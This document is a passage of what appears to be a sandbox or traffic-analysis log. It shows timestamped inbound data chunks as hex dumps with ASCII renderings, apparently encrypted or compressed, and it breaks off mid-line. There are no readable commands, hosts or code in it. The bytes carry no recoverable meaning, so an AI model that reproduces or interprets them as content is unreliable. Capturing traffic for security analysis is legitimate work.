2021-10-13 13:47:09 UTC	102	IN	Data Raw: 61 90 86 5a bf 12 0b 95 1a bf 5c 4a 70 ac 9b 46 be 5a 4b b0 a9 e0 cf 9e e6 59 bf 4d 18 48 d6 7c 6a 56 e8 92 bb c7 e3 9f 75 57 58 13 97 a1 54 23 da e9 fb e9 5a 3a c5 ba d0 0f 8e 81 8e 1d 6e 3d 20 5d 3f dc e3 63 6d d8 05 35 b9 52 16 c2 db a4 45 f8 c7 8f a3 7a 6a c7 1f 93 1e c3 ca 0d d9 a3 b7 40 ba 41 e6 76 2d 16 0b 6f fa 2f df 4b f7 25 43 14 99 1a e4 6d 1c 7c 7a 1d 32 0f 07 a4 c0 4e 8c d5 9f 7f 3c 33 cc 57 e2 f0 27 fb 1c fb c8 8f c9 d6 eb 3f 3a c8 bf 7d 9e a3 bc e2 fc e2 2c 32 74 08 59 56 71 42 ac c5 8d f5 df 61 49 56 15 53 02 78 68 15 c8 4c 3a 17 3a e6 76 c3 5f 0f 4f 57 95 d5 b6 5e 60 bc 29 8d 18 69 8b d2 09 04 43 33 f1 8a ac 01 a5 8f 3d 8c ae 6b a8 0e cc a3 59 6f f3 70 08 7d b1 fd b3 2b df 6d 27 b2 15 22 72 e3 f7 19 af ac 06 81 40 12 bc 26 36 55 34 e8 0c Data Ascii: aZ\JpFZKYMH\|jVuWXT#Z:n= ]?cm5REzj@Av-o/K%Cm\|z2N<3W'?:},2tYVqBaIVSxhL::v_OW^`)iC3=kYop}+m'"r@&6U4
2021-10-13 13:47:09 UTC	103	IN	Data Raw: e0 a7 ce a8 3b 39 6b be 21 6c e1 8e 9e 5d 21 b5 f9 1b c5 6b 09 df db 02 26 c1 db 98 fa 4e 12 ea fd 96 b2 62 26 33 e7 d2 13 c0 07 9d 3c 8c b4 03 e3 cf 03 48 31 59 a2 8d bd 9a 09 d9 a0 a7 02 b1 d7 66 40 fa 65 13 42 13 95 8f 89 43 26 30 72 76 f0 79 22 68 bc db 32 6f 01 51 eb 92 c1 36 15 de 83 84 91 04 e0 76 0c d9 03 43 c7 e6 5c 3c 84 3b b1 9f ed fb 2f b6 4a fc c6 9a 62 49 3e 91 ea 5e 22 40 0c a5 77 ae 6b c3 fc 90 7e 65 8c eb 37 09 30 6a 69 ba 8f 43 41 e3 47 17 d4 b3 fa 70 59 b3 8e e5 5d 39 47 b8 47 0f 32 11 d7 4c 8e 4f f0 22 c7 41 ec d0 e9 4d 69 49 53 ab 2d 0e 31 7a 6f 59 c8 5b 8e f2 63 2d 1e 6f 37 25 84 b2 1e 8e 30 84 93 78 17 dc 0b a9 85 b2 e1 88 53 69 2f 63 e2 41 b4 1e 6e c7 65 f0 87 de a3 1a 9b b9 89 eb ff 7f ad c2 3a 60 92 33 f1 8c ca 83 b5 69 90 58 50 Data Ascii: ;9k!l]!k&Nb&3<H1Yf@eBC&0rvy"h2oQ6vC\<;/JbI>^"@wk~e70jiCAGpY]9GG2LO"AMiIS-1zoY[c-o7%0xSi/cAne:`3iXP
2021-10-13 13:47:09 UTC	104	IN	Data Raw: 13 af 27 05 f3 8c 3d a8 fc f6 f5 27 20 18 3f da 11 8f 0f 3f cf e2 ac 06 d4 60 bd 3c b8 ac 12 ba 3b 0e 53 38 68 a9 c5 1f c1 5d 28 0d d8 71 e5 38 1b 20 8d bd fb 92 78 a5 34 8a a6 74 a4 d9 14 1d 93 87 a2 15 a4 7e bb 64 fb 36 a8 48 48 13 aa 72 cc 32 6d 3d 5e 62 a7 eb b4 bf 5e 2a ce ed 08 ae 08 b7 6a db 17 b3 16 e2 54 f2 7b cb 6f b8 6d 02 26 c7 58 37 c0 aa 51 a2 64 0c a2 b0 a9 26 da 64 8b a3 12 52 74 e4 f3 29 51 63 c9 3f 9e 09 9b c4 87 a5 4c 98 79 2c 62 5c 79 57 78 ef 33 c3 40 0f 7c c2 bb 4f 4d cf b4 29 03 06 1e 51 d4 7f 78 ef a2 73 94 81 5d 3d 3c 46 b1 81 38 a6 85 92 6c 45 b5 30 89 d4 32 7a 07 1b 35 0c 37 e3 25 4a 81 76 9f 67 0f 9a 7b 8c 30 40 e8 ad 3f 43 a1 8a 67 62 2d 22 c6 39 90 bb 92 ab cc 4d 25 bf 5c ea 38 57 d6 0d f6 0c d5 85 36 fa fb 83 92 e0 48 54 99 Data Ascii: '=' ??`<;S8h](q8 x4t~d6HHr2m=^b^*jT{om&X7Qd&dRt)Qc?Ly,b\yWx3@\|OM)Qxs]=<F8lE02z57%Jvg{0@?Cgb-"9M%\8W6HT
2021-10-13 13:47:09 UTC	105	IN	Data Raw: b4 22 31 e7 19 6e 17 35 c3 e6 03 c3 67 ad f0 7d c7 5c 51 81 63 48 5f b2 ad f2 94 52 93 c9 6b f5 4c 9e d1 98 87 44 21 b2 37 57 13 d6 1d 27 79 88 dd 0d 6d 99 ca a3 cd 78 1f 66 24 cd 14 f0 28 6b a3 97 00 63 6c e2 80 e3 a7 71 b6 5d c6 04 5d aa 8d da c7 cf b8 cf a1 e1 4c a5 1c fa ae 8b c0 71 c5 ec c9 d2 49 89 3c b6 3f 05 af 47 ad bf f8 3c d6 03 10 4f fa 09 95 8b 92 45 4f f8 3f f0 e6 74 70 8c d9 8e 0d 73 ed 09 30 7e 7c 8e 00 c5 96 e8 dd 7f 80 75 8f 8e 2f c7 9b 7e 77 cc f0 ae 9e 3c ec cb 3d c7 0a 96 d0 2d 07 ac 2c 82 a0 61 c0 23 b7 54 d5 ac 87 f7 73 4c d3 96 69 a6 d8 14 65 25 87 8d 7b f4 c1 3d 0f c4 c7 ee 28 aa db be b7 44 15 03 fa 54 81 37 e2 dd bd 9c ba 9e dc f7 a0 58 89 9e 83 e1 3d 23 52 5d 37 7e fe d3 06 25 1d ef 9c f1 d8 36 14 0c 5e a7 8e cd 86 dd b4 3b 42 Data Ascii: "1n5g}\QcH_RkLD!7W'ymxf$(kclq]]LqI<?G<OEO?tps0~\|u/~w<=-,a#TsLie%{=(DT7X=#R]7~%6^;B
2021-10-13 13:47:09 UTC	107	IN	Data Raw: 1b 79 39 c2 c3 44 a4 01 d5 51 1d 31 b8 4c 22 c0 65 5d 1c 12 b0 32 07 3e 0f ed 9f c6 78 a5 3a a0 d6 92 0f d5 54 f6 11 80 13 cc b2 b4 22 96 dc 01 60 b2 61 9c bf 12 7b 82 e7 e4 3f 39 53 6f c6 8d 7f c4 7b 13 f7 5a b6 9c 02 f4 54 20 bb 0c 8c 79 30 27 ce 71 be 67 5f 61 22 f7 8e 52 0d ab 30 6c a9 0c 1e 87 e1 73 23 03 ca f2 8b ca 45 26 00 76 70 11 06 26 ff 06 f6 6c 32 c2 3a ef 0f 9f d1 f6 db 62 68 f2 7e e9 fd 44 a3 55 a2 17 07 1b 45 63 89 a1 c5 05 f4 dc 19 5d 93 15 19 a6 e2 ee 7e 14 12 4d 95 72 49 af e1 9a cc b4 4e 19 2d 54 ff 45 b0 49 da b6 17 87 d2 51 36 0c 26 29 69 27 29 7e b7 01 3d cb cd c7 fd 4b 36 49 1f 85 1c 21 17 f8 6f ec 8e c0 84 49 68 1d 81 a8 d2 3a ac cf 8f 2b 66 44 e5 53 5f a5 4d a9 80 ea 0a 51 5b da ff 86 32 d8 e1 d6 58 94 8d 63 05 2a 3a ac e2 2e 7f Data Ascii: y9DQ1L"e]2>x:T"`a{?9So{ZT y0'qg_a"R0ls#E&vp&l2:bh~DUEc]~MrIN-TEIQ6&)i')~=K6I!oIh:+fDS_MQ[2Xc*:.
2021-10-13 13:47:09 UTC	108	IN	Data Raw: 0c 5b 7b 19 9a d3 7a 9c d9 0c c6 16 07 e4 dd 2a 2e f6 4c d0 f4 50 3e 9b 2b 66 b7 22 d3 ca c0 b2 e6 19 26 62 af 09 40 12 54 26 9e 18 74 e0 d4 6a 07 ad 36 f9 7d 33 e2 27 53 c4 7b 68 a0 8b 60 24 7e 2f d5 46 3b 29 7c dd 20 31 75 40 1a bd 3c 2e fa 81 a3 8c 3a 72 44 82 f0 bf 26 6c 78 e4 ea d4 99 4d 65 29 01 d5 5e 44 28 07 bd 1b 45 63 b9 f8 f9 20 3a d4 59 86 32 73 a4 d9 e1 92 21 78 6c f2 07 71 05 4b 23 b0 e3 af 3c aa 16 73 4a 63 00 ec 8d b7 59 d2 23 41 6e 02 19 ec e7 f7 6d 08 10 5c 58 ba 68 06 0f b7 d4 f5 22 60 5e 4e 43 fb 54 28 86 e6 f1 c6 43 ae 35 90 0c 49 ba f3 aa 3b 09 33 cc 58 74 ed f6 16 e7 cb df 80 c2 4c 84 fc 0c 78 b0 fc a3 4a 74 8b bb bd 88 27 52 14 29 26 3c 6c fe ef e0 07 bd ba 88 6a d6 ec 08 ac 59 d3 3e 44 3f 51 5d e6 1c 08 c2 a3 23 fc 20 24 8b 18 0a Data Ascii: [{z*.LP>+f"&b@T&tj6}3'S{h`$~/F;)\| 1u@<.:rD&lxMe)^D(Ec :Y2s!xlqK#<sJcY#Anm\Xh"`^NCT(C5I;3XtLxJt'R)&<ljY>D?Q]# $
2021-10-13 13:47:09 UTC	109	IN	Data Raw: 87 60 9c 9c 51 fa ba 64 e9 4e 03 09 77 c4 39 08 cd 1e 6b f7 e5 fb c2 8f fe 1d 53 41 03 ae e3 a5 63 73 2d 85 52 60 66 99 4d ee e5 bb df 19 d5 34 b8 fc 9e dd 57 9d 99 8c ae f2 f0 60 8f 68 e7 01 f0 38 3d d5 fa 41 e2 8b 4c 2c 1a 1e df 8a b1 53 c5 ee a5 6a 5a da cf 88 43 5b 0e d9 fe 71 cf 24 36 78 3e 56 e8 6d ea e4 a8 87 ba 57 12 98 7f b6 c7 2e e6 81 14 56 b6 a3 82 03 d0 a6 0d 41 46 e2 30 94 3b 6d 2d b6 85 0b e8 1d e1 b5 e9 6e c1 ae 23 d0 11 f8 c7 70 f2 59 21 df d0 93 54 50 5e 44 48 e6 e5 68 eb 53 9c ef 6a af 0b ce 79 ef 1e b4 a9 8d 58 24 8a 70 82 05 90 b9 9a 9d 73 33 d0 c8 20 ea d9 d5 9f 80 6d 1c 87 4f 39 f8 16 e7 e3 3f a8 28 c9 c7 f3 17 3a c9 bb 38 48 6e 1f a5 ab aa b9 3a 7f 6f 0e 61 ea 42 19 7c 8d 5c 5c a1 81 a9 4b fa 19 48 7c 7f ae 24 bf d2 c6 66 26 ff 88 Data Ascii: `QdNw9kSAcs-R`fM4W`h8=AL,SjZC[q$6x>VmW.VAF0;m-n#pY!TP^DHhSjyX$ps3 mO9?(:8Hn:oaB\|\\KH\|$f&
2021-10-13 13:47:09 UTC	111	IN	Data Raw: f3 cf 7a d9 f9 8a 9c 46 5e 7f ea fb 69 67 a3 89 2e 93 97 2f 6e ee c1 61 ba a6 d4 c1 13 e6 0b 03 da 5d 7d 51 d9 14 96 74 96 1e 0a 40 9a 84 80 77 4b d8 5f 17 0a dd f5 7f 5d 84 c2 93 29 ba 5c 33 0f b7 23 14 9a c8 bf be ff d0 a1 39 84 27 42 2b d2 64 4a 15 e3 3c b1 8e b9 58 e5 4a c0 05 b7 32 3b 64 03 6b 67 78 1d 78 f4 9f 86 27 44 d3 3c 56 7c bf 54 8e 0b 1f 37 84 4e a7 e1 72 36 ad 0a 44 0a 30 c3 68 cd 9b ec 91 6d b2 6c 39 c7 4c f6 28 bd ac 36 7f fd 3c 4d 54 33 69 9f f9 34 c8 37 ec 2a 38 6e 70 c8 de 11 67 98 dd 72 82 f9 ec c8 38 82 67 7a c6 e5 70 34 f6 f4 2b 3b 1a 58 c2 3c d1 66 5d 92 f7 57 89 81 93 f4 ec 7b 40 9f 40 0a 9d da 60 b4 53 4e a9 84 2a 64 b3 b9 ab ff 22 f4 f4 39 fd 06 66 1e e3 d0 c5 c3 42 bb 5f be dd 03 6b 25 3a 0c 84 c8 75 16 25 0f ed a8 e6 63 e2 81 Data Ascii: zF^ig./na]}Qt@wK_])\3#9'B+dJ<XJ2;dkgxx'D<V\|T7Nr6D0hml9L(6<MT3i478npgr8gzp4+;X<f]W{@@`SNd"9fB_k%:u%c
2021-10-13 13:47:09 UTC	112	IN	Data Raw: 37 32 99 21 73 4d c6 c3 f8 41 a8 66 46 c9 2b ff b5 b6 23 36 ee 35 d8 b1 8e 94 de 9b 51 b8 e9 2a 93 78 53 ac 6f a6 18 7a 3c 78 44 08 8d 93 a1 54 83 1a 1a 1d 17 b1 d8 25 10 6e 6e 71 3f 4f 75 c9 36 0f 78 55 d8 ac 1a 0f 5b 2d 6d 0e 4a f0 17 65 c3 fe a4 38 60 0b 0f b9 ac b6 99 28 a7 6e 8b a3 91 7e 2f 07 88 22 e4 34 ab 1c e1 1b f8 84 b2 52 8d 43 e6 b5 a6 a2 9c 11 09 1c d9 ed 68 39 ca d1 a4 4e b1 c3 c6 c7 d1 e3 bb 45 9d b5 06 28 dc 6b cb f1 34 80 46 37 b3 e7 dc 6e d8 ff c7 79 68 ea b5 01 17 d6 5b 25 c0 e5 c9 34 27 64 8e 8a 54 f3 78 cd c8 ac 5b 66 4d 47 ea fc 69 c4 5a 49 a7 03 4c 93 dc c4 f8 c3 58 f4 68 4e 96 2a 42 c7 d1 2f 30 ee fa 80 af 76 17 03 b5 35 cb cd f7 96 7a 3a 04 3f 70 de ba 22 a1 0d 30 1c 79 70 4c 32 fc 24 bc 57 a3 f8 c1 91 8b bb 64 0f bc d2 da 29 62 Data Ascii: 72!sMAfF+#65QxSoz<xDT%nnq?Ou6xU[-mJe8`(n~/"4RCh9NE(k4F7nyh[%4'dTx[fMGiZILXhNB/0v5z:?p"0ypL2$Wd)b
2021-10-13 13:47:09 UTC	113	IN	Data Raw: 87 fb 20 c2 99 c6 7c cc 6e 90 40 c1 de 41 ee 5c af 84 32 39 4f 94 59 01 3e 68 3b 6a 5d 5e 27 42 cb 14 14 6a 8c 9a 7c 29 ce 15 77 c2 9e 6a 0e ae 81 d4 6d dc 1c ed 6d c4 ef ef ca f7 11 fd 51 69 9b cc 92 e5 b7 49 9e 1a 23 38 6a ad cf dc 90 08 89 bb 38 57 4c 53 65 98 57 a9 51 84 7a 14 b5 53 be 3b 0f c2 b9 27 f8 9b d8 fa 0a 56 d6 b7 f7 87 d8 17 70 3a 0a 9d 5f cd 49 bd d1 0a 61 43 ff 89 9d 56 d0 84 a9 27 1f bb b6 e0 57 15 24 a9 6f bb de f4 8c da bb 61 b8 14 73 e9 18 a4 1c 80 32 f2 9c 68 22 c0 3f a0 f2 eb 33 95 9e 60 4e b8 5d f6 92 be d5 b4 aa 97 52 1e 09 0a 7c ec 2b d0 c3 ca 15 b3 f5 3c 96 a4 9c 19 bc e1 36 79 08 2c 62 97 90 e9 66 fd d9 7b 8f 1b bf 55 c0 a5 e9 b2 34 51 80 2f fd 1c e9 80 f4 1c d6 74 e4 7a 06 8a ef eb 37 9a 5d 3e b6 1b 6f c4 75 36 da 61 bc b8 3f Data Ascii: \|n@A\29OY>h;j]^'Bj\|)wjmmQiI#8j8WLSeWQzS;'Vp:_IaCV'W$oas2h"?3`N]R\|+<6y,bf{U4Q/tz7]>ou6a?
2021-10-13 13:47:09 UTC	114	IN	Data Raw: a3 c0 eb 9d 61 6e e2 94 72 49 70 b8 0b 89 e7 85 d6 89 02 52 ed a7 44 27 3c 1d 37 df 3b 3a c0 14 92 b9 fa d8 10 22 36 62 2b e0 d8 bb 15 05 32 fa d8 df 26 6e d5 fc 66 ca b2 00 e5 6a 68 de 20 ed b5 cd 03 9f 7e 0d 43 b7 56 e1 03 a5 57 7f 61 c2 28 25 e0 20 42 5e d7 24 d1 59 a1 07 92 c9 ea 60 e8 0d 85 b0 e2 71 90 16 e7 ef d5 ef 16 7a 5c 71 36 aa 03 26 a6 21 75 67 11 c7 e6 99 13 b1 4e 45 61 3c 93 91 41 8d ba 38 a0 93 a1 62 43 ee dc dd 63 b9 e2 d9 d7 23 c5 fc 9a 7d 99 75 a5 e2 9d b6 95 6f b6 7d a9 1b a9 21 25 73 61 04 db 73 71 e7 87 a4 cb 50 c4 9c 33 d4 85 a9 17 25 8f ab 65 e6 03 a3 5f bc 73 3d 82 7e d9 c6 5a 4b d8 cd c7 9d b8 69 90 38 78 69 d9 a6 03 3f a9 64 97 28 6d ed 11 c0 46 ad cb 5c 64 e6 5b 46 ff 62 7f 53 a1 01 d2 1a 90 78 0e 6c 7b ac 7b 51 60 ce 51 a2 71 Data Ascii: anrIpRD'<7;:"6b+2&nfjh ~CVWa(% B^$Y`qz\q6&!ugNEa<A8bCc#}uo}!%sasqP3%e_s=~ZKi8xi?d(mF\d[FbSxl{{Q`Qq
2021-10-13 13:47:09 UTC	115	IN	Data Raw: 79 10 bc ef 22 8c 76 c2 b8 b9 74 d4 ef 21 d8 63 cf 0d fa 42 46 3a 8a 19 4c b5 24 b1 f1 84 77 4b 0e 55 c4 1e 58 eb 77 42 41 e1 43 bb 24 c8 86 d9 b7 fe b7 09 47 6c 9c fe b3 96 e5 b8 6e 46 5a 5f 3f e1 5c bf 9b 1f bc 69 20 b9 66 48 c7 1f ec 08 ff 4b d2 3e 4a be c5 8e 30 c8 a6 6a 2e 5b 63 e2 6d 9e cc ac 9c 9d d2 f9 c2 c9 22 00 79 df 6a 4d 2d 3c 48 35 26 f2 27 a2 82 58 d4 3f fe d7 5a 21 d2 d9 49 22 4f 75 28 28 31 a4 fd db f8 03 61 b7 86 9f ac 7a 76 e4 b9 d9 3b 0d 7a 99 81 d8 65 6e 8b 89 01 05 de ce 7c 74 22 9e 53 5b a6 e6 80 f4 1b c0 ba 97 80 a5 e6 3c b2 7e fa b7 be e8 24 06 25 fa c8 47 97 23 c6 30 1b c7 62 10 e4 cd 4e 6a 21 0a 59 d9 31 db d9 1c f4 41 f3 11 65 13 52 20 46 59 5d 17 6e e5 ee 77 f0 b3 10 68 ab dc c3 cd 3d b9 c3 0c 0b 77 8a 4f 0c ab 8a d1 b8 76 80 Data Ascii: y"vt!cBF:L$wKUXwBAC$GlnFZ_?\i fHK>J0j.[cm"yjM-<H5&'X?Z!I"Ou((1azv;zen\|t"S[<~$%G#0bNj!Y1AeR FY]nwh=wOv
2021-10-13 13:47:09 UTC	116	IN	Data Raw: ea 2e 86 d8 5e 8b f3 cd a4 ea 09 49 a9 21 56 ba 25 4d 14 8d 40 54 d6 2c 63 b3 52 fe 03 f8 d9 ff 5a 3c ad dd 48 28 ba af e0 46 eb 4d b6 c6 d7 45 f1 15 6d ac 22 b9 4c 0e 91 d9 62 55 6a 3f 8b 0f b0 08 b9 4d 6e b3 72 75 cc e9 64 63 24 8f 5d 0a 01 16 b4 81 f8 71 51 dc 19 46 4c fd d9 24 61 b1 65 53 c9 40 09 e7 65 b0 f5 b6 99 bc 9f bf 32 55 73 a9 90 c8 1d 4e a4 38 67 e9 79 be b7 82 72 1e 82 db fd 5d 60 9c 5a 1e 87 0d 58 b3 a9 ee e7 6f e5 a7 4d 61 28 db 5f fa 9f 82 ed 72 96 47 84 54 52 84 2c 82 50 9c e9 c1 46 a2 3e 38 0f e7 f7 c9 68 14 a7 03 3e b9 9b 77 0e dc c0 74 39 03 90 e6 b7 69 5f 0b 46 b8 bb 7c bf f8 7a 2d 32 13 8d 76 1e 9a d2 ce 87 7f 2a bc 83 94 83 41 e8 90 a7 7a a8 f6 c3 0a 0a 19 df b1 3b 7d c4 7f 53 2f 2d 3a 72 57 43 ac 1b a5 18 a5 d6 b6 b8 71 00 ad db Data Ascii: .^I!V%M@T,cRZ<H(FMEm"LbUj?Mnrudc$]qQFL$aeS@e2UsN8gyr]`ZXoMa(_rGTR,PF>8h>wt9i_F\|z-2v*Az;}S/-:rWCq
2021-10-13 13:47:09 UTC	118	IN	Data Raw: 0c 6a 10 7f f3 15 b0 39 e8 f5 f2 29 e0 bb 86 18 10 4f 83 d7 28 f1 74 0e 52 e8 80 81 14 bc a8 f6 87 03 b5 d7 4c 38 30 07 55 6b 6e e8 ed 52 a7 75 21 4f b5 e9 67 b2 c1 16 78 25 60 09 22 19 38 f8 49 f1 7c e8 1e ea 65 28 56 ef 28 bd 0b 8d ac 9a 3a 02 e7 8e 95 a1 f7 06 27 34 7b be 20 73 f3 a2 c3 31 ae 74 84 85 f3 2a ba 7a d8 64 c6 27 95 61 4f e9 d2 3b e5 46 ad 43 f4 c0 6e 1b f6 e2 ed 1d 77 ac 8b 77 30 65 f8 08 64 70 e3 e6 3b 1f 47 df b0 44 80 27 d2 93 80 c7 14 41 32 19 0f e0 bc b5 72 c6 d2 dd 15 5c 2b 7d da 51 21 ba 6c 6c df cf e0 f2 5b f1 be a8 35 85 0b 8d 64 4c 28 30 cf 98 98 14 6e 12 57 11 d1 e1 63 cc 56 d8 ba 5e 70 57 51 d5 b2 ed fd 52 45 bf c1 62 80 15 f5 2f ca a4 f8 41 60 0a 82 66 43 7f 15 cf 51 b8 df 57 0b b3 71 a9 e3 05 df 93 4e 86 79 f4 c8 18 95 22 37 Data Ascii: j9)O(tRL80UknRu!Ogx%`"8I\|e(V(:'4{ s1t*zd'aO;FCnww0edp;GD'A2r\+}Q!ll[5dL(0nWcV^pWQREb/A`fCQWqNy"7
2021-10-13 13:47:09 UTC	119	IN	Data Raw: 84 ac 90 56 49 26 f7 4a 55 a3 d4 b6 f6 83 b8 df 44 31 9b 8c bf ae 3c 3b bc 7e c7 bc d1 98 2a a8 63 64 28 92 49 1d 61 9b 13 f9 bc 08 26 de 71 30 95 72 c0 8b c0 73 27 7f af a0 7f b5 76 6f 44 75 9e fc 45 c9 47 33 06 b6 0f 74 16 49 4a 95 0f ad 69 d8 38 09 b1 ac b6 b3 fa e4 26 6e 91 b3 4d 71 82 4d 36 16 ff 51 2b d5 c0 d2 8a f6 d6 e6 b7 cf c2 91 ac f7 9c df 4a e4 19 56 2c e4 33 d4 8a 1a 52 96 18 44 24 70 e5 9e a6 15 96 e9 01 79 ab b4 2b 7c 8f 86 80 ae fb 2b 00 14 cb a1 22 17 ef dd a5 70 18 f8 b2 5f 07 c3 31 3f 10 72 ab b1 26 d5 63 18 d4 ee fd 2d f0 58 e1 5b 27 be 33 fc 27 fa ce 87 1b fa 8f 7d 41 22 62 0a e7 68 c4 7d 23 f3 90 ea 72 32 66 1c f6 2b f8 46 57 29 6e 64 d2 a4 f7 4a 82 07 aa 63 d7 14 05 d1 5d 58 53 5a 9b 4d 67 fc 5b 2c 41 e9 c7 ec 4a 98 de 38 8c 01 c5 Data Ascii: VI&JUD1<;~*cd(Ia&q0rs'voDuEG3tIJi8&nMqM6Q+JV,3RD$py+\|+"p_1?r&c-X['3'}A"bh}#r2f+FW)ndJc]XSZMg[,AJ8
2021-10-13 13:47:09 UTC	120	IN	Data Raw: 69 2f 85 37 66 56 2b 85 99 21 d2 ce c2 17 73 18 c6 f8 92 47 b7 57 01 4c 44 cd 27 ac 19 7c eb af e1 2c ea 44 8e f8 3b d0 7d 48 5d 2e e9 a2 dc a3 28 6c 67 69 fa e1 79 86 72 16 64 71 32 fc ce 4b 83 2f 7b dd 47 e5 25 4d 3e a3 0f 5e 9f ea a5 21 e7 f5 e8 b0 a6 76 6d 0f 79 9e ed d9 87 86 a1 09 01 15 05 7e 87 2e 40 a3 57 2d 8a e1 b8 01 3a 72 a7 95 d9 b9 8f 73 75 56 66 de 9c d7 09 18 58 b1 44 73 f0 3c 3c 79 a6 7f 52 f6 bb 14 07 60 42 78 bc e3 a0 be db aa e3 72 33 c1 74 f3 9f 52 fc 15 e6 d8 1a 02 d6 15 c3 69 ad 58 0c 02 2d 07 ff 69 a0 73 9d 80 8f 92 2e cf 66 cb 40 31 57 a7 fe cf 0f 10 8e cc a2 ff a6 60 b5 08 d2 ec 11 da f4 3b 31 d8 6c f5 37 97 79 50 fe d2 6e 08 ea 75 17 30 33 83 ad 0b 27 d3 83 74 fd bf 0f b4 80 e7 71 fe 6a bf ce e9 99 ac 52 9d 14 1d a8 4f 52 36 d7 Data Ascii: i/7fV+!sGWLD'\|,D;}H].(lgiyrdq2K/{G%M>^!vmy~.@W-:rsuVfXDs<<yR`Bxr3tRiX-is.f@1W`;1l7yPnu03'tqjROR6
2021-10-13 13:47:09 UTC	121	IN	Data Raw: 9b 9d f9 f9 c6 b6 7e 11 7b 20 cc c3 d9 8f 43 d4 09 d5 13 79 52 8a 81 a0 4e 0d a6 f4 5c 07 ed ac 53 d4 06 3d e4 7c ea ff 5a e8 d8 6d 69 16 af 6f 9d 76 49 da 9f e8 14 ea 52 84 1e 13 38 19 5d e7 cc 97 8a 17 82 73 6e 9e 27 34 be 76 71 77 0a d0 60 67 6d 18 cc 34 9c de 3c 2a 46 41 ae 8f 3b 14 49 7f 4b 87 44 7f 6e fc f4 0f 9d 61 e0 4d 8b 43 a1 aa b0 5c c2 cf 94 62 34 b6 46 34 70 d6 c7 a6 16 a1 31 a6 7b 8d 85 f3 50 8a 72 40 f4 11 17 66 6c 42 74 98 04 29 7b 9c 50 41 9e be 40 e4 5e 1b e3 16 60 b5 60 42 e3 5c 04 b5 73 b9 8f 39 f3 1e 98 7a 51 65 02 ae d6 b5 c0 4d c1 28 2c 4c 94 57 6a cf a8 c7 9f 24 01 2f 57 d2 33 56 7c 59 50 54 5c 57 84 7a 5b 96 40 5e e6 12 ca 72 c5 90 1a 6d 7c cf 1b c9 29 f0 87 e6 f6 2c 71 4a d2 f1 28 46 51 92 9f 15 3e 88 dc 24 d6 35 ce b7 a8 d8 d3 Data Ascii: ~{ CyRN\S=\|ZmiovIR8]sn'4vqw`gm4<*FA;IKDnaMC\b4F4p1{Pr@flBt){PA@^``B\s9zQeM(,LWj$/W3V\|YPT\Wz[@^rm\|),qJ(FQ>$5
2021-10-13 13:47:09 UTC	123	IN	Data Raw: 40 99 ee d9 ac 52 5c 11 9d 2e c8 cc a1 46 47 84 7a d4 01 e7 63 9d ad 72 cc b9 60 f2 bd ec ac a7 2c 04 25 18 6f 4f 08 ef 71 55 a3 44 e4 20 c7 3f 57 96 78 67 e0 d1 da f1 b3 45 5b 66 4d 1a 71 68 8d ca 16 1f be d3 35 64 8b 28 47 1e 3c 48 ec 41 e3 90 89 13 8e 5b 10 d2 8f 37 db c2 af f9 29 e0 60 59 0c 55 f8 a0 08 03 2a a8 e6 dd 29 c9 80 de fc c5 a0 01 3c 79 7f b7 61 11 68 25 28 87 f3 25 bf 02 fc b6 8f 01 7a b8 18 93 b5 72 03 05 3f 4e be b8 7f 4f 82 41 37 85 0a e5 0e cb f6 3c 04 8a 01 3f f4 ec b6 9f 89 62 2d a9 93 79 d8 96 a5 31 90 4c ce d6 5d a9 a2 92 4a cd ed 9a 14 47 59 ba 66 71 8d a4 f8 30 a2 4e 13 68 d3 45 63 37 76 35 43 24 28 31 cb 81 0c 7a 2c d5 93 58 8e 35 23 fc 89 c0 50 b6 b6 a1 73 e4 6d c9 44 02 6d 08 dd 09 61 01 91 51 f2 4c 88 f3 af 1b 98 df 44 e8 e6 Data Ascii: @R\.FGzcr`,%oOqUD ?WxgE[fMqh5d(G<HA[7)`YU*)<yah%(%zr?NOA7<?b-y1L]JGYfq0NhEc7v5C$(1z,X5#PsmDmaQLD
2021-10-13 13:47:09 UTC	124	IN	Data Raw: de c4 26 01 89 c6 06 ed 40 2d a3 0a cd d1 0e a3 66 22 2f f1 32 29 c7 fd 10 67 06 41 28 55 3c 35 55 78 af 29 89 3c 09 98 b6 95 09 17 3e 9b 1c 4e 00 06 3a 2e b4 0f 60 9b 12 d6 c5 e1 cc 00 55 e2 98 20 54 e3 75 3d 70 ca 38 b1 40 f1 c0 dd ce 6d ac 61 d2 78 59 19 1c ad 06 5c cc a5 96 b6 6c ae 97 2e 1d 35 19 e6 ec d9 c7 67 14 a7 d3 4d 5f af 08 4c b1 f6 af 40 8b a0 c2 d7 10 35 1d 69 1f c0 78 8c 82 2e 7f eb c9 59 18 d4 df 2e b0 55 4f b5 36 9b 4c 6c ee 19 cb 59 f9 ac 86 36 66 93 41 54 87 5a a9 df 70 1a a1 44 23 b0 56 0d e3 cc b5 24 b1 c1 8f e9 88 0d 1f ea f7 39 2e 56 9f a9 9b 1f 62 fd 6e ea ac 2a db 4a c9 1b f7 21 08 e8 b5 7d ba 88 25 42 b7 74 db c6 83 df 3c f7 c2 d5 2a 18 3c f6 42 42 d7 52 bd 98 24 74 61 cc fa 31 39 91 f4 a8 17 a1 8a 3a ed 35 77 65 df 74 d4 99 d0 Data Ascii: &@-f"/2)gA(U<5Ux)<>N:.`U Tu=p8@maxY\l.5gM_L@5ix.Y.UO6LlY6fATZpD#V$9.VbnJ!}%Bt<<BBR$ta19:5wet
2021-10-13 13:47:09 UTC	125	IN	Data Raw: ba 1b d8 3d ae 67 28 53 1d 96 5d e0 3f 8d 86 76 24 55 e3 10 ee 37 64 18 f5 e5 4d 5f 6b d5 be 11 a7 3e ed dc 2a 03 d0 db 39 d3 37 6b 60 32 fd 44 3b 3b a0 ec 7f 58 36 44 01 93 80 76 96 64 b0 41 1c b7 1f 13 8e 5f aa 03 f4 45 58 37 a3 e9 7b f7 76 38 7e ae 0b 98 04 87 8e 5f d4 58 99 49 73 14 88 f5 ed 9d 3f a8 5d 3c 5e ca a0 7a e6 37 a7 fd 50 e2 16 a1 47 3a 4c fa be c0 5d 12 04 ff 03 b4 9d b5 2c 41 7e d7 82 0f b5 c5 64 54 8b 29 8c 7c 72 3e 65 24 10 36 08 02 e1 ca 45 68 45 dc 3e e5 1b 9e 44 10 18 e2 dd 46 47 83 dc f2 76 2e d7 4e c4 cb 98 fa b6 e2 6c 28 e1 6c 34 86 50 aa b4 8c 4c dd b9 53 a8 2b d0 4a f2 66 5c f0 58 3a 4c 7a 79 6a 7d 20 99 67 e0 4e f7 57 03 d4 49 3d d5 07 be 65 06 1c 2f 9c ef d8 cc 95 0b b7 c6 a5 09 ab 1f ca 9a 43 